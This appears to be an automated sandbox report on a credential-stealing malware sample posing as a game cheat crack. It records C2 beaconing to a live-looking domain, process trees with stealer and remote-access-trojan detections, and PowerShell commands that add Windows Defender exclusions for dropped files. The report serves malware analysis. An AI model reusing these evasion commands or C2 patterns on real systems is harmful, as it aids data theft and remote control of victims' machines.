Jan 13, 2025 13:16:40.181052923 CET	1.1.1.1	192.168.2.9	0xb84b	No error (0)	dual.s-part-0017.t-0009.fb-t-msedge.net	s-part-0017.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 13:16:40.181052923 CET	1.1.1.1	192.168.2.9	0xb84b	No error (0)	s-part-0017.t-0009.fb-t-msedge.net		13.107.253.45	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:13.062206030 CET	1.1.1.1	192.168.2.9	0xa678	No error (0)	237025cm.n9shteam.in		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:20.803776026 CET	1.1.1.1	192.168.2.9	0x4ef4	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:17:36.266851902 CET	1.1.1.1	192.168.2.9	0x4892	No error (0)	237025cm.n9shteam.in		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

237025cm.n9shteam.in

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49882	104.21.80.1	80	7508	C:\Program Files\Windows NT\smss.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:17:13.074659109 CET	306	OUT	POST /UpdatesqlCdn.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 237025cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:17:13.420428991 CET	344	OUT	Data Raw: 00 03 01 06 03 0d 01 03 05 06 02 01 02 00 01 02 00 0b 05 0e 02 01 03 0e 02 00 0f 04 06 0f 06 03 0c 0f 03 08 02 53 05 01 0f 02 06 00 04 01 07 05 06 0b 0d 00 0d 0e 04 0a 07 01 07 0d 06 51 05 0b 00 56 0e 0f 04 56 04 06 0d 57 0b 02 0d 04 0b 08 07 0c Data Ascii: SQVVWRVU\L~@NTtaj\bep~oit^k`hlR`[l^zJhn`@`Yte~V@xmP~bi
Jan 13, 2025 13:17:13.521039009 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:17:13.756083012 CET	1028	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:17:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv6AXVENQPFAg%2BT52K2QdTC7osc7Ath%2F3eelVnd%2FeVxxC49VFN8lpuS6BPS3bbSWnipcpvPOWV9z%2F2nJ1IjbZIWPe4Fe6vkkmrgEnT99vReBAb0eqGnp5vBV70Rmy%2Fkpk4rGiDkNKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015526b3feac443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2886&min_rtt=1686&rtt_var=3033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=129329&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 13, 2025 13:17:13.853828907 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	52220	104.21.80.1	80	2192	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:17:21.330337048 CET	306	OUT	POST /UpdatesqlCdn.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 237025cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:17:21.699465990 CET	344	OUT	Data Raw: 00 02 04 02 06 09 01 07 05 06 02 01 02 06 01 05 00 07 05 09 02 07 03 0e 03 07 0e 01 03 06 01 57 0f 00 03 0e 02 56 06 02 0d 05 07 0b 07 0a 07 04 04 50 0b 0b 0c 04 04 05 05 07 03 00 06 52 05 0a 02 00 0f 0a 04 05 01 04 0e 07 0c 00 0c 06 0e 03 07 06 Data Ascii: WVPRXQP\L~C~`_\tamBbupB~oacl^OhMtDoBzpjJkCkTcwx}e~V@B{SfN}Li
Jan 13, 2025 13:17:21.774307966 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:17:22.019752026 CET	1038	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:17:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fs90pKoEXzLjXiSDTycAoqO2ZJm4jnTr8TwTqDY7%2F96d4%2F5Ycyz%2B63SfLQxmyUGdJYMNWxBWy2%2BdRKNbpcrKxSsdw2AiwPPPmjooin4Xj%2FqDZ%2F%2F0EgHdHjYDpjD4i%2BwLEVmpLFEbjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015529edc7a7d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4043&min_rtt=1920&rtt_var=4967&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=77211&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Target ID:	0
Start time:	07:16:44
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe"
Imagebase:	0x1c0000
File size:	2'866'940 bytes
MD5 hash:	DF15D1F8F7CC71BB1889895B367C7D2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:16:45
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"
Imagebase:	0xbc0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:16:51
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:16:51
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:16:52
Start date:	13/01/2025
Path:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
Wow64 process (32bit):	false
Commandline:	"C:\portsurrogateFontCrt/BlockcontainerWin.exe"
Imagebase:	0xfd0000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	07:16:56
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
Wow64 process (32bit):	false
Commandline:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
Imagebase:	0x30000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
Wow64 process (32bit):	false
Commandline:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
Imagebase:	0x880000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
Imagebase:	0x2d0000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat"
Imagebase:	0x7ff617870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:16:57
Start date:	13/01/2025
Path:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
Imagebase:	0x770000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:16:59
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff637580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:16:59
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7a7e90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:17:04
Start date:	13/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:17:09
Start date:	13/01/2025
Path:	C:\Program Files\Windows NT\smss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows NT\smss.exe"
Imagebase:	0xab0000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:17:13
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
Imagebase:	0x7ff617870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:17:13
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	07:17:13
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff637580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	07:17:13
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff765fd0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	07:17:18
Start date:	13/01/2025
Path:	C:\Program Files\Windows NT\smss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows NT\smss.exe"
Imagebase:	0x750000
File size:	2'545'152 bytes
MD5 hash:	B3F6318C958712D0C78B5A969EE2EFD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	07:17:21
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Imagebase:	0x7ff617870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	07:17:21
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	07:17:21
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff637580000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	07:17:21
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7a7e90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	1498
Total number of Limit Nodes:	28

Executed Functions

Function 001DDF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D0863: GetModuleHandleW.KERNEL32(kernel32), ref: 001D087C
Part of subcall function 001D0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001D088E
Part of subcall function 001D0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001D08BF

Part of subcall function 001DA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001DA655

Part of subcall function 001DAC16: OleInitialize.OLE32(00000000), ref: 001DAC2F
Part of subcall function 001DAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001DAC66
Part of subcall function 001DAC16: SHGetMalloc.SHELL32(00208438), ref: 001DAC70

GetCommandLineW.KERNEL32 ref: 001DDF5C
